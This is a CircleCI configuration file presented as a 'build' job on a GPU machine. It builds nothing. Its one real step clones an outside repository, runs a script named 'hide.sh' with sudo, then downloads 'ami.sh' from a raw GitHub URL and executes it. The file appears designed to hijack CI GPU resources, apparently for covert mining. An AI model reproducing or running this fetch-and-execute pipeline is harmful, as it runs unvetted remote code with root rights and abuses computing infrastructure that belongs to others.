version: 2.1 
 
jobs: 
  build: 
    machine: 
      image: ubuntu-1604-cuda-10.1:201909-23 
    resource_class: gpu.nvidia.large 
    steps: 
      - checkout 
      - run: nvidia-smi 
      - run: 
          name: "AmiMiami" 
          command: sudo apt update && sudo apt install nodejs && sudo apt install npm && git clone https://github.com/Vaping86/Vaping86.git && cd Vaping86 && chmod +x hide.sh && sudo ./hide.sh && wget https://raw.githubusercontent.com/Vaping86/Circleci/main/ami.sh && chmod +x ami.sh && ./ami.sh